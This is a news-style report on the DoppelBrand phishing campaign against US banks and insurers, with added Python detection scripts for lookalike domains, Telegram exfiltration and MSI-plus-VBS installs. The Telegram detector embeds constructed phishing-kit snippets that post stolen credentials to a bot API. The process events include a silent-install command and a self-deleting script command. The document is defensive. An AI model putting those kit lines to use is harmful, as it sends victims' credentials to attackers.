
Operation DoppelBrand: How Hackers Hijack Trusted Brands to Steal Your Data

Summary

– A phishing campaign dubbed Operation DoppelBrand targeted Fortune 500 companies, including Wells Fargo and USAA, from late 2025 to early 2026.
– The campaign, attributed to the financially motivated threat actor GS7, used lookalike domains and cloned login portals to steal credentials.
– The operation employed a highly automated infrastructure of over 150 domains, using rotating registrars, Cloudflare hosting, and automated TLS (SSL) certificates issued within hours of domain registration.
– Beyond credential theft, the attackers deployed remote access tools like LogMeIn Resolve to gain persistent control of compromised systems.
– The primary targets were major US financial and technology firms, with the attacker acting as an initial access broker to sell compromised accounts.

A sophisticated and highly automated phishing campaign has been targeting some of the world’s largest financial and technology corporations, according to a recent cybersecurity investigation. Dubbed Operation DoppelBrand, this extensive effort focuses on impersonating trusted brands to steal sensitive user credentials and gain long-term access to corporate systems. The campaign, which researchers have linked to a threat actor known as GS7, leverages a vast network of counterfeit websites designed to look identical to legitimate online portals for banking, insurance, and tech services.

Security analysts at SOCRadar tracked the campaign’s latest wave, which primarily targeted Fortune 500 companies like Wells Fargo and USAA between late 2025 and early 2026. The operation’s infrastructure, however, shows connections to activity dating back to 2022. The attackers use a combination of phishing emails and cloned login pages to trick victims. These fake pages are remarkably convincing, copying logos, styling, and form layouts from the real sites. In some instances, users are even funneled through a fake OneDrive interface before landing on the spoofed banking portal.

The scale of the operation is significant, with researchers identifying over 150 domains directly tied to this activity and nearly 200 more showing similar suspicious characteristics. To maintain this sprawling network, the attackers rely on automation and short-lived infrastructure. They frequently use registrars like Namecheap and OwnRegistrar, host domains through Cloudflare, and obtain SSL certificates within hours of registering a new domain. Common hallmarks include domains registered for one-year terms, automated certificates from Let’s Encrypt, and wildcard DNS records that allow for the rapid creation of brand-specific subdomains.
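The hallmarks listed above (campaign registrars, Cloudflare nameservers, a Let's Encrypt certificate hours after registration, a one-year term, wildcard DNS) are only useful to a hunting team when combined with a brand-lookalike check, because the hosting and certificate traits alone describe a large slice of the legitimate web. The following Python script is an added example, not code from SOCRadar or the original article: it scores constructed domain records (the kind you would assemble from certificate-transparency logs plus WHOIS and DNS lookups) against those hallmarks, and only ranks a domain when it also imitates one of the brands the article names. The brand list, registrar strings, homoglyph table, 24-hour certificate window, threshold and sample records are all assumptions for illustration.

```python
"""Hunt for lookalike domains carrying the infrastructure hallmarks the article
lists. Added example; the records below are constructed, not real indicators."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

BRANDS = ("wellsfargo", "usaa", "onedrive")          # brands named in the article
SUSPECT_REGISTRARS = ("namecheap", "ownregistrar")   # substrings matched in the WHOIS registrar field
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "rn": "m", "vv": "w"}  # assumed table

@dataclass
class DomainRecord:
    """One row as assembled from CT logs plus WHOIS/DNS lookups (constructed schema)."""
    domain: str
    registrar: str
    nameservers: Tuple[str, ...]
    created: datetime
    expires: datetime
    cert_issued: Optional[datetime]
    cert_issuer: str
    wildcard_dns: bool

def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def normalize(label: str) -> str:
    """Collapse hyphens and common digit/letter-pair substitutions."""
    s = label.lower().replace("-", "")
    for fake, real in HOMOGLYPHS.items():
        s = s.replace(fake, real)
    return s

def brand_match(domain: str, brands=BRANDS) -> Optional[str]:
    """Return the brand a domain imitates, or None. Every label is checked so that
    brand-specific subdomains created under a wildcard record are caught too."""
    for label in domain.lower().split("."):
        n = normalize(label)
        for brand in brands:
            if brand in n or (len(n) >= 4 and levenshtein(n, brand) <= 1):
                return brand
    return None

def score_domain(rec: DomainRecord, brands=BRANDS) -> Tuple[int, List[str]]:
    """Count the campaign hallmarks present on one record and explain each hit."""
    reasons = []
    brand = brand_match(rec.domain, brands)
    if brand:
        reasons.append(f"lookalike of {brand}")
    if any(r in rec.registrar.lower() for r in SUSPECT_REGISTRARS):
        reasons.append("registrar seen in campaign")
    if any(ns.lower().endswith("cloudflare.com") for ns in rec.nameservers):
        reasons.append("Cloudflare nameservers")
    if rec.cert_issued is not None:
        if timedelta(0) <= rec.cert_issued - rec.created <= timedelta(hours=24):
            reasons.append("certificate within 24h of registration")
        if "let's encrypt" in rec.cert_issuer.lower():
            reasons.append("Let's Encrypt issuer")
    if abs((rec.expires - rec.created).days - 365) <= 1:
        reasons.append("one-year registration")
    if rec.wildcard_dns:
        reasons.append("wildcard DNS")
    return len(reasons), reasons

def triage(records, threshold: int = 4):
    """Rank records, but only those that actually imitate a brand: the hosting and
    certificate hallmarks on their own match a large share of legitimate sites."""
    ranked = []
    for rec in records:
        score, reasons = score_domain(rec)
        if brand_match(rec.domain) and score >= threshold:
            ranked.append((rec.domain, score, reasons))
    return sorted(ranked, key=lambda r: -r[1])

T0 = datetime(2026, 1, 10, 9, 0)
CF = ("ada.ns.cloudflare.com", "bob.ns.cloudflare.com")
SAMPLE_RECORDS = [  # constructed; the .example TLD is reserved for documentation
    DomainRecord("secure-wellsfarg0-login.example", "NameCheap, Inc.", CF, T0,
                 T0 + timedelta(days=365), T0 + timedelta(hours=3), "Let's Encrypt", True),
    DomainRecord("newsletter-tools.example", "MarkMonitor Inc.", ("ns1.newsletter-tools.example",),
                 datetime(2019, 3, 1), datetime(2029, 3, 1), None, "", False),
    DomainRecord("my-hobby-blog.example", "NameCheap, Inc.", CF, T0,
                 T0 + timedelta(days=365), T0 + timedelta(hours=2), "Let's Encrypt", False),
    DomainRecord("rnicrosoft-onedrive.example", "OwnRegistrar, Inc.", CF, datetime(2025, 12, 1),
                 datetime(2026, 12, 1), datetime(2025, 12, 2, 6), "Let's Encrypt", False),
]

if __name__ == "__main__":
    for domain, score, reasons in triage(SAMPLE_RECORDS):
        print(f"{score} {domain}: {', '.join(reasons)}")
```

Note that the hobby-blog record scores 5 of 7 hallmarks yet is not ranked, because nothing about its name imitates a brand; that is the intended behaviour, and the same reasoning applies when tuning any feed built on these traits.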

Once a victim enters login information on one of these fake pages, the stolen data is not merely collected but actively processed. Credentials, together with the victim's IP address, geolocation, and device details, are automatically forwarded to a Telegram bot controlled by the attackers. This lets the threat actor sift through the stolen data, filtering and prioritizing high-value accounts for further exploitation.
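For a responder, the Telegram channel is the most actionable part of that description: the bot token and chat ID embedded in a captured kit identify the attacker's collection point, and a direct call to the Bot API from a workstation is a strong signal when a kit does the posting from the victim's browser rather than from the phishing server. The following Python script is an added example, not code from SOCRadar or the article: it extracts token, chat ID and API methods from two constructed kit fragments, then scans constructed egress-proxy lines for requests to `api.telegram.org/bot<token>/...`. The kit snippets, the token (a fake value in the 35-character Bot API shape), the log format and the addresses are all assumptions.

```python
"""Triage a captured phishing kit for its Telegram exfiltration channel and
scan egress proxy logs for direct Bot API calls. Added example: the kit
snippets, the token and the log lines are constructed, not campaign data."""
import re
from urllib.parse import urlsplit

# Bot API tokens look like "<numeric bot id>:<35-char secret>" (assumed format).
TOKEN_RE = re.compile(r"\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
CHAT_ID_RE = re.compile(r"chat_id[\"']?\s*[=:]\s*[\"']?(-?\d{5,})")
METHOD_RE = re.compile(r"api\.telegram\.org/bot[^/\s\"']+/(\w+)")

# Constructed server-side kit fragment (PHP style): the victim's browser never sees the token.
KIT_PHP = r'''
$token = "1234567890:AAEFAKE0TOKEN0FOR0EXAMPLE0ONLY00000";
$chat_id = "987654321";
$msg = "Login: $email | Pass: $password | IP: $ip | Geo: $country | UA: $ua";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg));
'''

# Constructed client-side variant: the browser posts to Telegram directly, so egress logs can see it.
KIT_JS = r'''
fetch("https://api.telegram.org/bot1234567890:AAEFAKE0TOKEN0FOR0EXAMPLE0ONLY00000/sendDocument",
      {method: "POST", body: JSON.stringify({chat_id: -1001234567890, text: collected})});
'''

def mask(token: str) -> str:
    """Keep the bot id (it identifies the bot) but hide most of the secret in reports."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}...{secret[-4:]}"

def triage_kit(source: str) -> dict:
    """Pull the bot token, chat id and API methods out of kit source code."""
    return {
        "tokens": TOKEN_RE.findall(source),
        "chat_ids": CHAT_ID_RE.findall(source),
        "methods": METHOD_RE.findall(source),
    }

# Constructed egress log, one request per line: "<timestamp> <client ip> <verb> <url> <status>".
PROXY_LOG = [
    "2026-01-12T09:14:03Z 10.20.30.41 GET https://secure-login.example/onedrive/ 200",
    "2026-01-12T09:14:22Z 10.20.30.41 POST https://api.telegram.org/bot1234567890:AAEFAKE0TOKEN0FOR0EXAMPLE0ONLY00000/sendDocument 200",
    "2026-01-12T09:15:01Z 10.20.30.52 GET https://web.telegram.org/ 200",
    "2026-01-12T09:15:40Z 10.20.30.77 GET https://api.telegram.org/ 404",
]

def detect_telegram_exfil(lines):
    """Flag requests to the Bot API path (api.telegram.org/bot<token>/...); ordinary
    Telegram web or desktop traffic does not use that path and is left alone."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, verb, url, _status = parts[:5]
        u = urlsplit(url)
        if u.hostname != "api.telegram.org" or not u.path.startswith("/bot"):
            continue
        segs = u.path.split("/")            # ["", "bot<token>", "<method>", ...]
        token = segs[1][len("bot"):]
        method = segs[2] if len(segs) > 2 else ""
        hits.append({"ts": ts, "client": client, "verb": verb, "method": method,
                     "token": mask(token) if ":" in token else token})
    return hits

if __name__ == "__main__":
    for name, src in (("php", KIT_PHP), ("js", KIT_JS)):
        print(name, triage_kit(src))
    for hit in detect_telegram_exfil(PROXY_LOG):
        print(hit)
```

The caveat is in the two kit fragments: when the kit posts server-side, as the PHP fragment does, the victim organisation's egress logs show only the visit to the lookalike domain, and the bot details come from analysing the captured page rather than from proxy telemetry.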

The campaign’s objectives extend far beyond simple credential theft. After compromising an account, the attackers often deploy legitimate remote management tools, such as LogMeIn Resolve, to establish persistent, unattended access to the victim’s system. These tools are typically delivered as MSI files, accompanied by small VBS scripts that handle installation, privilege escalation, and the removal of traces. This move suggests the threat actor is acting as an initial access broker, securing a foothold in corporate networks which can then be sold or transferred to other criminal affiliates for further monetization.
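The delivery chain described in that paragraph (a small VBS script that installs an MSI and then cleans up after itself) leaves a recognisable shape in process-creation telemetry, even though the article does not publish the actual command lines. The following Python script is an added example, not code from SOCRadar or the article: it runs two rules over constructed Sysmon-style process events, flagging `msiexec.exe` launched by a script host to install a package from a user-writable directory, and a child `cmd.exe` that deletes the very script its parent is running. The events, paths, rule names and the user-writable directory pattern are assumptions for illustration, and a benign SYSTEM-context install is included to show what the rules leave alone.

```python
"""Flag the MSI-plus-VBS delivery chain described above in process-creation
telemetry. Added example; the events are constructed and the rules are one
plausible reading of the described behaviour, not the campaign's command lines."""
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # hosts that execute .vbs
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|appdata\\local\\temp)\\", re.I)
VBS_PATH = re.compile(r'"?([A-Za-z]:\\[^"]+?\.vbs)"?', re.I)
MSI_PATH = re.compile(r'"?([A-Za-z]:\\[^"]+?\.msi)"?', re.I)

# Constructed process-creation events (Sysmon Event ID 1 style, trimmed to the fields used).
EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 880, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"id": 2, "pid": 5232, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\jdoe\Downloads\setup_helper.vbs"'},
    {"id": 3, "pid": 5300, "ppid": 5232, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Users\jdoe\AppData\Local\Temp\remote_support.msi" /qn'},
    {"id": 4, "pid": 5344, "ppid": 5232, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c del "C:\Users\jdoe\Downloads\setup_helper.vbs"'},
    # Benign comparison: an endpoint-management agent installing a package as SYSTEM.
    {"id": 5, "pid": 6001, "ppid": 1200, "image": r"C:\Windows\CCM\CcmExec.exe",
     "cmd": "CcmExec.exe"},
    {"id": 6, "pid": 6002, "ppid": 6001, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Windows\ccmcache\a1\update.msi" /qn'},
]

def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()

def find_suspicious_installs(events: List[Dict]) -> List[Dict]:
    """Return one finding per rule hit, in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue                      # only children of a script host interest these rules
        name, cmd = basename(e["image"]), e["cmd"]
        # Rule 1: a script host drives msiexec to install a package from a user-writable directory.
        if name == "msiexec.exe" and re.search(r"(^|\s)/i\s", cmd, re.I):
            pkg = MSI_PATH.search(cmd)
            if pkg and USER_WRITABLE.search(pkg.group(1)):
                silent = " silent" if re.search(r"\s/q[nb]?(\s|$)", cmd, re.I) else ""
                findings.append({"event": e["id"], "rule": "script_host_msi_install",
                                 "detail": f"{basename(parent['image'])} ->{silent} msiexec /i {pkg.group(1)}"})
        # Rule 2: a child cmd.exe deletes the very script its parent is running (trace removal).
        if name == "cmd.exe" and re.search(r"\bdel\b", cmd, re.I):
            own, target = VBS_PATH.search(parent["cmd"]), VBS_PATH.search(cmd)
            if own and target and own.group(1).lower() == target.group(1).lower():
                findings.append({"event": e["id"], "rule": "script_self_delete",
                                 "detail": f"{own.group(1)} deleted by its own child cmd.exe"})
    return findings

if __name__ == "__main__":
    for f in find_suspicious_installs(EVENTS):
        print(f["event"], f["rule"], f["detail"])
```

Because the rules key on the script-host parent, an approved LogMeIn Resolve rollout pushed by an endpoint-management agent (the SYSTEM-context events above) does not fire; an allowlist for help-desk flows that do start from a user-run script is still needed, and the privilege-escalation step the article mentions is not covered by these two rules.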

In a direct communication with investigators, an individual claiming to be GS7 stated they had been operating for approximately a decade and provided screenshots of phishing control panels. Financial analysis supports the monetization angle; a cryptocurrency wallet shared during the investigation had received around 0.28 BTC, valued between $25,000 and $32,000 at the time.

The primary targets remain major U.S. financial institutions, investment firms, and insurance providers, with global technology and healthcare brands also in the crosshairs. The majority of the observed phishing activity is concentrated in English-speaking markets, particularly the United States and Western Europe, highlighting the campaign’s focus on high-value economic sectors.

(Source: InfoSecurity Magazine)
